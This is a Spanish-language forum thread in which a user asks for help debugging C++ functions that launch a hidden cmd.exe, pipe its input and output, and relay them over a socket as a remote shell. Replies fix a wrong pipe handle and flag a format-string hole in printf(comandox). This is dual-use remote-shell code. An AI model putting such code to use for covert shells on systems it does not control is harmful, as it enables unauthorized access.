Hola, resulta que estoy haciendo pruebas con sockets y basicamente estoy siguiendo los manuales que encontre en el foro...

hice mis funciones para controlar una shell remota como las del ejemplo de EON de este link:

http://foro.elhacker.net/programacion_cc/wsasocket_contra_socket-t210589.0.html

pero por alguna razon puedo hacer todo menos escribir datos de entrada en el PIPE. si alguien me puede decir que estoy haciendo mal seria de gran ayuda.. ya que por mas que relei el codigo no encuentro el error.

aqui estan mis funciones

void datos_func::bshell() {
    SECURITY_ATTRIBUTES saPipe;  
	STARTUPINFO sInfo;          
 
	ZeroMemory(&saPipe,sizeof(saPipe));
	saPipe.nLength = sizeof(saPipe);
	saPipe.lpSecurityDescriptor = NULL;
	saPipe.bInheritHandle = TRUE;
 
	CreatePipe(&stdinRd, &stdinWr, &saPipe, 0);
	CreatePipe(&stdoutRd, &stdoutWr, &saPipe, 0);
 
	GetStartupInfo(&sInfo);
	sInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
        sInfo.wShowWindow = SW_HIDE;
        sInfo.hStdOutput  = stdoutWr;
        sInfo.hStdError   = stdoutWr;
        sInfo.hStdInput   = stdinRd;
 
	CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&sInfo,&pInfo);
 
	Sleep(100);
    printf(" [ok] Shell iniciada");    
 
}
 
void datos_func::rshell() {
 
    char buf[1024]; 
	DWORD bUsados; 
 
	//PeekNamedPipe(stdoutRd, NULL, NULL, NULL, &bTotales, NULL);	
	PeekNamedPipe(stdoutRd,buf,sizeof(buf),NULL,&bTotales,NULL);	
	ZeroMemory(buf,sizeof(buf));
	ReadFile(stdoutRd, buf, sizeof(buf), &bUsados, NULL);
	Sleep(10);
	strcat(buf," \n");
	send(inetsock,buf,sizeof(buf),0);
 
} 
 
void datos_func::eshell(char comandox[100]) {
    printf(comandox); 
   	WriteFile(stdoutWr,comandox,strlen(comandox),&bUsados,NULL);
	Sleep(100);
} 
 

la funcion que crea el proceso y la que lee los datos de salida funcionan bien, pero no la de escribir datos nuevos para enviarlos al cmd.exe


que esta mal en la ultima funcion.. 

muchas gracias por responder sirdarckcat, de hecho ya habia intentando cambiando el handle de la entrada de datos del pipe y tampoco funciono :S, no se porque cuando ejecuto la primer funcion que arranca la shell, y luego la funcion que lee los datos me devuelve el:


quiere decir que la funcion que lee funciona. pero al ejecutar la funcion que escribe el comando, y vuelvo a ejecutar la funcion que lee, ya no me regresa ningun dato en pantalla.

 


si sirve de algo esta es la forma en que ejecuto la funcion en el cliente.
asi la recibo


asi se ejecuta


en la ultima funcion añadi un print para saber si el comando esta llegando bien, y al parecer todo esta en orden pero no funciona.

Ya relei bastante el codigo y no parece haber errores, tendra algo que ver que utilizo una clase donde declare todas las variables ??

class datos_func {
public:
      void bshell();
      void rshell();
      void eshell(char comandox[100]);
      void cshell();
      
private:
 
 //shell
 HANDLE stdinRd, stdinWr, stdoutRd, stdoutWr; // Los pipes
 PROCESS_INFORMATION pInfo;
 DWORD bTotales;
 DWORD bUsados;

};


 

Este código:

void datos_func::eshell(char comandox[100]) {
    printf(comandox); 
   	WriteFile(stdinWr,comandox,strlen(comandox),&bUsados,NULL);
	Sleep(100);
}

Es vulnerable a FormatStringOverflow (FSoF), te recomiendo que no te acostumbres a hacer eso., %s esta para eso

Saludos!!

printf("%s",comandox);